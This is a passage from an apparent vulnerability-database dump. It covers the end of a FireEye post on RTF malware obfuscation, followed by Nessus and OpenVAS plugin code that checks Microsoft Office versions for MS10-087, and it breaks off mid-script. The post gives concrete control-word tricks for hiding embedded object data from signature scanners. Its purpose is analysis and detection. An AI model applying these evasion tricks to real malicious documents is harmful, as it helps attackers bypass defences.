\n\n| Obfuscated | {\\object\\objocx\\objdata 44444444{\\\\*\\par314 5555}6666} |\n|---|---|\n| Clear | {\\object\\objocx\\objdata 4444444455556666} |\n\n\\par is a known control word that does not accept any data. The RTF parser will skip the control word and only the data that follows remains.\n\n2\\. \n\n| Obfuscated | {\\object\\objocx\\objdata 44444444{\\\\*\\datastore314 5555}6666} |\n|---|---|\n| Clear | {\\object\\objocx\\objdata 444444446666} |\n\nThe RTF parser can also recognize \\datastore and understands that it can accept data, therefore the following data will be consumed by \\datastore.\n\n3\\. \n\n| Obfuscated | {\\object\\objocx\\objdata 44444444{\\\\*\\unknown314 5555}6666} |\n|---|---|\n| Clear | {\\object\\objocx\\objdata 444444446666} |\n\nFor an analyst, it\u2019s difficult to manually extract embedded objects from an obfuscated RTF, and no public tool can handle obfuscated RTF. However, winword.exe uses the OleConvertOLESTREAMToIStorage function to convert OLE1 native data to an OLE2 structured storage object. Here\u2019s the prototype of OleConvertOLESTREAMToIStorage:\n\n\n\nThe object pointed to by lpolestream contains a pointer to the OLE1 native binary data. We can set a breakpoint at OleConvertOLESTREAMToIStorage and dump out the object data which has been de-obfuscated by the RTF parser:\n\n\n\nThe last command, .writemem, writes a section of memory to d:\\evil_objdata.bin. You can specify other paths as you want; 0e170020 is the start address of the memory range, and 831b6 is the size.\n\nMost of the obfuscation techniques of \\objdata can also apply to embedded images, but for images, it seems there is no obvious choke point like OleConvertOLESTREAMToIStorage. 
To extract an obfuscated picture, locate the RTF parsing code quickly using a data breakpoint; that will reveal the best point to dump the whole data.\n\n#### **Conclusion**\n\nOur adversaries are sophisticated and familiar with the RTF format and the inner workings of Microsoft Word. They have managed to devise these obfuscation tricks to evade traditional signature-based detection. Understanding how our adversary is performing obfuscation can in turn help us improve our detection of such malware.\n\n#### **Acknowledgements**\n\nThanks to Yinhong Chang, Jonell Baltazar and Daniel Regalado for their contributions to this blog.\n", "modified": "2016-05-20T14:59:00", "published": "2016-05-20T14:59:00", "id": "FIREEYE:38120E3D3979DCD57297419690545DDD", "href": "https://www.fireeye.com/blog/threat-research/2016/05/how_rtf_malware_evad.html", "type": "fireeye", "title": "How RTF malware evades static signature-based detection", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2020-09-14T16:11:01", "description": "The remote Mac OS X host is running a version of Microsoft Office that\nis affected by several vulnerabilities.\n\nIf an attacker can trick a user on the affected host into opening a\nspecially crafted Office file, these issues could be leveraged to\nexecute arbitrary code subject to the user's privileges.", "edition": 12, "published": "2010-11-09T00:00:00", "title": "MS10-087: Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2423930) (Mac OS X)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3336", "CVE-2010-3334", "CVE-2010-3335", "CVE-2010-3333"], "modified": "2010-11-09T00:00:00", "cpe": ["cpe:/a:microsoft:open_xml_file_format_converter:::mac", "cpe:/a:microsoft:office:2011::mac", "cpe:/a:microsoft:office:2008::mac"], "id": "MACOSX_MS_OFFICE_NOV2010.NASL", "href": "https://www.tenable.com/plugins/nessus/50531", "sourceData": "#TRUSTED 
\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50531);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2018/07/14\");\n\n script_cve_id(\n \"CVE-2010-3333\",\n \"CVE-2010-3334\",\n \"CVE-2010-3335\",\n \"CVE-2010-3336\"\n );\n script_bugtraq_id(44652, 44656, 44659, 44660);\n script_xref(name:\"MSFT\", value:\"MS10-087\");\n script_xref(name:\"MSKB\", value:\"2423930\");\n script_xref(name:\"MSKB\", value:\"2454823\");\n script_xref(name:\"MSKB\", value:\"2476511\");\n script_xref(name:\"MSKB\", value:\"2476512\");\n\n script_name(english:\"MS10-087: Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2423930) (Mac OS X)\");\n script_summary(english:\"Check version of Microsoft Office\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote Mac OS X host is affected by\nmultiple remote code execution vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Mac OS X host is running a version of Microsoft Office that\nis affected by several vulnerabilities.\n\nIf an attacker can trick a user on the affected host into opening a\nspecially crafted Office file, these issues could be leveraged to\nexecute arbitrary code subject to the user's privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/security/bulletin/ms10-087\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Office for Mac 2011,\nOffice 2008 for Mac, and Open XML File Format Converter for Mac.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office:2008::mac\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office:2011::mac\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:open_xml_file_format_converter:::mac\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/MacOSX/packages\", \"Host/uname\");\n\n exit(0);\n}\n\n\ninclude(\"misc_func.inc\");\ninclude(\"ssh_func.inc\");\ninclude(\"macosx_func.inc\");\n\n\n\nif(sshlib::get_support_level() >= sshlib::SSH_LIB_SUPPORTS_COMMANDS)\n enable_ssh_wrappers();\nelse disable_ssh_wrappers();\n\nfunction exec(cmd)\n{\n local_var buf, ret;\n\n if (islocalhost())\n buf = pread(cmd:\"/bin/bash\", argv:make_list(\"bash\", \"-c\", cmd));\n else\n {\n ret = ssh_open_connection();\n if (!ret) exit(1, \"ssh_open_connection() failed.\");\n buf = ssh_cmd(cmd:cmd);\n ssh_close_connection();\n }\n return buf;\n}\n\n\npackages = 
get_kb_item(\"Host/MacOSX/packages\");\nif (!packages) exit(1, \"The 'Host/MacOSX/packages' KB item is missing.\");\n\nuname = get_kb_item(\"Host/uname\");\nif (!uname) exit(1, \"The 'Host/uname' KB item is missing.\");\nif (!egrep(pattern:\"Darwin.*\", string:uname)) exit(1, \"The host does not appear to be using the Darwin sub-system.\");\n\n\n# Gather version info.\ninfo = '';\ninstalls = make_array();\n\nprod = 'Office for Mac 2011';\nplist = \"/Applications/Microsoft Office 2011/Office/MicrosoftComponentPlugin.framework/Versions/14/Resources/Info.plist\";\ncmd = 'cat \\'' + plist + '\\' | ' +\n 'grep -A 1 CFBundleShortVersionString | ' +\n 'tail -n 1 | ' +\n 'sed \\'s/.*string>\\\\(.*\\\\)<\\\\/string>.*/\\\\1/g\\'';\nversion = exec(cmd:cmd);\nif (version && version =~ \"^[0-9]+\\.\")\n{\n version = chomp(version);\n if (version !~ \"^14\\.\") exit(1, \"Failed to get the version for \"+prod+\" - '\"+version+\"'.\");\n\n installs[prod] = version;\n\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n fixed_version = '14.0.1';\n fix = split(fixed_version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(fix); i++)\n fix[i] = int(fix[i]);\n\n for (i=0; i<max_index(fix); i++)\n if ((ver[i] < fix[i]))\n {\n info +=\n '\\n Product : ' + prod +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version + '\\n';\n break;\n }\n else if (ver[i] > fix[i])\n break;\n}\n\nprod = 'Office 2008 for Mac';\nplist = \"/Applications/Microsoft Office 2008/Office/MicrosoftComponentPlugin.framework/Versions/12/Resources/Info.plist\";\ncmd = 'cat \\'' + plist + '\\' | ' +\n 'grep -A 1 CFBundleShortVersionString | ' +\n 'tail -n 1 | ' +\n 'sed \\'s/.*string>\\\\(.*\\\\)<\\\\/string>.*/\\\\1/g\\'';\nversion = exec(cmd:cmd);\nif (version && version =~ \"^[0-9]+\\.\")\n{\n version = chomp(version);\n if (version !~ \"^12\\.\") exit(1, \"Failed to get the version for \"+prod+\" - '\"+version+\"'.\");\n\n 
installs[prod] = version;\n\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n fixed_version = '12.2.8';\n fix = split(fixed_version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(fix); i++)\n fix[i] = int(fix[i]);\n\n for (i=0; i<max_index(fix); i++)\n if ((ver[i] < fix[i]))\n {\n info +=\n '\\n Product : ' + prod +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version + '\\n';\n break;\n }\n else if (ver[i] > fix[i])\n break;\n}\n\nprod = 'Open XML File Format Converter for Mac';\nplist = \"/Applications/Open XML Converter.app/Contents/Info.plist\";\ncmd = 'cat \\'' + plist + '\\' | ' +\n 'grep -A 1 CFBundleShortVersionString | ' +\n 'tail -n 1 | ' +\n 'sed \\'s/.*string>\\\\(.*\\\\)<\\\\/string>.*/\\\\1/g\\'';\nversion = exec(cmd:cmd);\nif (version && version =~ \"^[0-9]+\\.\")\n{\n version = chomp(version);\n installs[prod] = version;\n\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n fixed_version = '1.1.8';\n fix = split(fixed_version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(fix); i++)\n fix[i] = int(fix[i]);\n\n for (i=0; i<max_index(fix); i++)\n if ((ver[i] < fix[i]))\n {\n info +=\n '\\n Product : ' + prod +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version + '\\n';\n break;\n }\n else if (ver[i] > fix[i])\n break;\n}\n\n\n# Report findings.\nif (info)\n{\n gs_opt = get_kb_item(\"global_settings/report_verbosity\");\n if (gs_opt && gs_opt != 'Quiet') security_hole(port:0, extra:info);\n else security_hole(0);\n\n exit(0);\n}\nelse\n{\n if (max_index(keys(installs)) == 0) exit(0, \"Office for Mac / Open XML File Format Converter is not installed.\");\n else\n {\n msg = 'The host has ';\n foreach prod (sort(keys(installs)))\n msg += prod + ' ' + installs[prod] + ' and ';\n msg = substr(msg, 0, strlen(msg)-1-strlen(' and '));\n\n msg += ' installed and thus is not affected.';\n\n 
exit(0, msg);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:43:31", "description": "The remote Windows host is running a version of Microsoft Office that\nis affected by several vulnerabilities :\n\n - An integer underflow exists in the way the application\n parses the PowerPoint file format, which could lead to\n heap corruption and allow for arbitrary code execution\n when opening a specially crafted PowerPoint file.\n (CVE-2010-2573)\n\n - A stack-based buffer overflow can be triggered when\n parsing specially crafted RTF files, leading to\n arbitrary code execution. (CVE-2010-3333)\n\n - A memory corruption vulnerability exists in the way\n the application parses specially crafted Office files\n containing Office Art Drawing records. (CVE-2010-3334)\n\n - A memory corruption vulnerability exists in the way\n drawing exceptions are handled when opening specially\n crafted Office files. (CVE-2010-3335)\n\n - A memory corruption vulnerability exists in the way\n the application parses specially crafted Office files.\n (CVE-2010-3336)\n\n - A DLL preloading (aka binary planting) vulnerability\n exists because the application insecurely looks in\n its current working directory when resolving DLL\n dependencies. 
(CVE-2010-3337)", "edition": 26, "published": "2010-11-09T00:00:00", "title": "MS10-087: Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2423930)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3336", "CVE-2010-3337", "CVE-2010-3334", "CVE-2010-3335", "CVE-2010-3333", "CVE-2010-2573"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:microsoft:office"], "id": "SMB_NT_MS10-087.NASL", "href": "https://www.tenable.com/plugins/nessus/50528", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(50528);\n script_version(\"1.33\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\n \"CVE-2010-2573\",\n \"CVE-2010-3333\",\n \"CVE-2010-3334\",\n \"CVE-2010-3335\",\n \"CVE-2010-3336\",\n \"CVE-2010-3337\"\n );\n script_bugtraq_id(\n 42628,\n 44628,\n 44652,\n 44656,\n 44659,\n 44660\n );\n script_xref(name:\"EDB-ID\", value:\"17474\");\n script_xref(name:\"MSFT\", value:\"MS10-087\");\n script_xref(name:\"MSKB\", value:\"2289158\");\n script_xref(name:\"MSKB\", value:\"2289161\");\n script_xref(name:\"MSKB\", value:\"2289169\");\n script_xref(name:\"MSKB\", value:\"2289187\");\n\n script_name(english:\"MS10-087: Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2423930)\");\n script_summary(english:\"Checks version of mso.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host through Microsoft\nOffice.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is running a version of Microsoft Office that\nis affected by several vulnerabilities :\n\n - An integer underflow exists in the way the application\n parses the PowerPoint file format, which could lead to\n heap corruption and allow for arbitrary code execution\n when opening a specially crafted PowerPoint file.\n (CVE-2010-2573)\n\n - A stack-based buffer overflow can 
be triggered when\n parsing specially crafted RTF files, leading to\n arbitrary code execution. (CVE-2010-3333)\n\n - A memory corruption vulnerability exists in the way\n the application parses specially crafted Office files\n containing Office Art Drawing records. (CVE-2010-3334)\n\n - A memory corruption vulnerability exists in the way\n drawing exceptions are handled when opening specially\n crafted Office files. (CVE-2010-3335)\n\n - A memory corruption vulnerability exists in the way\n the application parses specially crafted Office files.\n (CVE-2010-3336)\n\n - A DLL preloading (aka binary planting) vulnerability\n exists because the application insecurely looks in\n its current working directory when resolving DLL\n dependencies. (CVE-2010-3337)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/ms10-087\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Office XP, 2003, 2007, and\n2010.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/07/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/09\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_nt_ms02-031.nasl\", \"office_installed.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS10-087';\nkbs = make_list(\"2289158\", \"2289161\", \"2289169\", \"2289187\");\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\narch = get_kb_item_or_exit(\"SMB/ARCH\");\noffice_vers = hotfix_check_office_version();\nif (!is_accessible_share()) exit(1, \"is_accessible_share() failed.\");\nvuln = FALSE;\n\nx86_path = hotfix_get_commonfilesdir();\nif (!x86_path) audit(AUDIT_PATH_NOT_DETERMINED, 'Common Files');\nx64_path = hotfix_get_programfilesdirx86();\nif (arch == 'x64' && !x64_path) audit(AUDIT_PATH_NOT_DETERMINED, 'Program Files (x86)');\n\n# Office 2010\nif (office_vers[\"14.0\"])\n{\n if (\n hotfix_is_vulnerable(file:\"Mso.dll\", version:\"14.0.5128.5000\", min_version:'14.0.0.0', path:x86_path+\"\\Microsoft Shared\\Office14\", bulletin:bulletin, kb:\"2289161\") ||\n hotfix_is_vulnerable(file:\"Mso.dll\", arch:\"x64\", version:\"14.0.5128.5000\", min_version:'14.0.0.0', path:x64_path+\"\\Common Files\\Microsoft Shared\\Office14\", bulletin:bulletin, kb:\"2289161\")\n ) vuln = TRUE;\n}\n# Office 2007\nif 
(office_vers[\"12.0\"])\n{\n sp = get_kb_item(\"SMB/Office/2007/SP\");\n if (!isnull(sp) && sp == 2)\n {\n if (\n hotfix_is_vulnerable(file:\"Mso.dll\", version:\"12.0.6545.5004\", min_version:'12.0.0.0', path:x86_path+\"\\Microsoft Shared\\Office12\", bulletin:bulletin, kb:\"2289158\") ||\n hotfix_is_vulnerable(file:\"Mso.dll\", arch:\"x64\", version:\"12.0.6545.5004\", min_version:'12.0.0.0', path:x64_path+\"\\Common Files\\Microsoft Shared\\Office12\", bulletin:bulletin, kb:\"2289158\")\n ) vuln = TRUE;\n }\n}\n# Office 2003\nif (office_vers[\"11.0\"])\n{\n sp = get_kb_item(\"SMB/Office/2003/SP\");\n if (!isnull(sp) && sp == 3)\n {\n if (\n hotfix_is_vulnerable(file:\"Mso.dll\", version:\"11.0.8329.0\", min_version:'11.0.0.0', path:x86_path+\"\\Microsoft Shared\\Office11\", bulletin:bulletin, kb:\"2289187\") ||\n hotfix_is_vulnerable(file:\"Mso.dll\", arch:\"x64\", version:\"11.0.8329.0\", min_version:'11.0.0.0', path:x64_path+\"\\Common Files\\Microsoft Shared\\Office11\", bulletin:bulletin, kb:\"2289187\")\n ) vuln = TRUE;\n }\n}\n# Office XP\nif (office_vers[\"10.0\"])\n{\n sp = get_kb_item(\"SMB/Office/XP/SP\");\n if (!isnull(sp) && sp == 3)\n {\n if (\n hotfix_is_vulnerable(file:\"Mso.dll\", version:\"10.0.6867.0\", path:x86_path+\"\\Microsoft Shared\\Office10\", bulletin:bulletin, kb:\"2289169\") ||\n hotfix_is_vulnerable(file:\"Mso.dll\", arch:\"x64\", version:\"10.0.6867.0\", path:x64_path+\"\\Common Files\\Microsoft Shared\\Office10\", bulletin:bulletin, kb:\"2289169\")\n ) vuln = TRUE;\n }\n}\n\nif (vuln)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-10-30T10:45:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3336", "CVE-2010-3337", "CVE-2010-3334", "CVE-2010-3335", 
"CVE-2010-3333"], "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS10-087.", "modified": "2017-10-26T00:00:00", "published": "2010-11-10T00:00:00", "id": "OPENVAS:901166", "href": "http://plugins.openvas.org/nasl.php?oid=901166", "type": "openvas", "title": "Microsoft Office Remote Code Execution Vulnerabilities (2423930)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms10-087.nasl 7585 2017-10-26 15:03:01Z cfischer $\n#\n# Microsoft Office Remote Code Execution Vulnerabilities (2423930)\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow attackers to execute arbitrary code.\n Impact Level: System\";\ntag_affected = \"Microsoft Office XP Service Pack 3\n Microsoft Office 2003 Service Pack 3\n Microsoft Office 2007 Service Pack 2\n Microsoft Office 2010.\";\ntag_insight = \"Multiple flaws are caused by,\n - a stack overflow error when processing malformed Rich Text Format data.\n - a memory corruption error when processing Office Art Drawing records in\n Office files.\n - a memory corruption error when handling drawing exceptions.\n - a memory corruption error when handling SPID data in Office documents.\n - an error when loading certain libraries from the current working directory.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://www.microsoft.com/technet/security/bulletin/MS10-087.mspx\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS10-087.\";\n\nif(description)\n{\n script_id(901166);\n script_version(\"$Revision: 7585 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-26 17:03:01 +0200 (Thu, 26 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-10 14:58:25 +0100 (Wed, 10 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-3333\", \"CVE-2010-3334\", \"CVE-2010-3335\",\n \"CVE-2010-3336\", \"CVE-2010-3337\");\n script_bugtraq_id(44652, 44656, 44659, 44660, 42628);\n 
script_name(\"Microsoft Office Remote Code Execution Vulnerabilities (2423930)\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/38521\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/2923\");\n script_xref(name : \"URL\" , value : \"http://www.microsoft.com/technet/security/bulletin/MS10-087.mspx\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n## Get File Version\nfunction FileVer (file, path)\n{\n share = ereg_replace(pattern:\"([A-Za-z]):.*\", replace:\"\\1$\", string:path);\n if(share =~ \"[a-z]\\$\")\n share = toupper(share);\n file = ereg_replace(pattern:\"[A-Za-z]:(.*)\", replace:\"\\1\", string:path + file);\n ver = GetVer(file:file, share:share);\n return ver;\n}\n\n## MS Office XP, 2003, 2007, 2010\nif(get_kb_item(\"MS/Office/Ver\") =~ \"^[10|11|12|14].*\")\n{\n ## Get Office File Path\n path = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\",\n item:\"CommonFilesDir\");\n if(! 
path) {\n exit(0);\n }\n\n foreach ver (make_list(\"OFFICE10\", \"OFFICE11\", \"OFFICE12\", \"OFFICE14\"))\n {\n offPath = path + \"\\Microsoft Shared\\\" + ver;\n dllVer = FileVer(file:\"\\Mso.dll\", path:offPath);\n if(dllVer)\n {\n ## Grep for Mso.dll versions\n if(version_in_range(version:dllVer, test_version:\"10.0\", test_version2:\"10.0.6866.9\") ||\n version_in_range(version:dllVer, test_version:\"11.0\", test_version2:\"11.0.8328.9\") ||\n version_in_range(version:dllVer, test_version:\"12.0\", test_version2:\"12.0.6545.5003\")||\n version_in_range(version:dllVer, test_version:\"14.0\", test_version2:\"14.0.5128.4999\"))\n {\n security_message(0);\n exit(0);\n }\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-01-08T14:05:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3336", "CVE-2010-3337", "CVE-2010-3334", "CVE-2010-3335", "CVE-2010-3333"], "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS10-087.", "modified": "2020-01-07T00:00:00", "published": "2010-11-10T00:00:00", "id": "OPENVAS:1361412562310901166", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310901166", "type": "openvas", "title": "Microsoft Office Remote Code Execution Vulnerabilities (2423930)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Office Remote Code Execution Vulnerabilities (2423930)\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied 
warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.901166\");\n script_version(\"2020-01-07T09:06:32+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-07 09:06:32 +0000 (Tue, 07 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-11-10 14:58:25 +0100 (Wed, 10 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-3333\", \"CVE-2010-3334\", \"CVE-2010-3335\",\n \"CVE-2010-3336\", \"CVE-2010-3337\");\n script_bugtraq_id(44652, 44656, 44659, 44660, 42628);\n script_name(\"Microsoft Office Remote Code Execution Vulnerabilities (2423930)\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"MS/Office/Ver\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow attackers to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Office XP Service Pack 3\n\n - Microsoft Office 2003 Service Pack 3\n\n - Microsoft Office 2007 Service Pack 2\n\n - Microsoft Office 2010\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are caused by,\n\n - a stack overflow error when processing malformed Rich Text Format data.\n\n - a memory corruption error when processing Office Art Drawing records in\n Office files.\n\n - a memory corruption error when 
handling drawing exceptions.\n\n - a memory corruption error when handling SPID data in Office documents.\n\n - an error when loading certain libraries from the current working directory.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS10-087.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/2923\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-087\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nfunction FileVer (file, path)\n{\n share = ereg_replace(pattern:\"([A-Za-z]):.*\", replace:\"\\1$\", string:path);\n if(share =~ \"[a-z]\\$\")\n share = 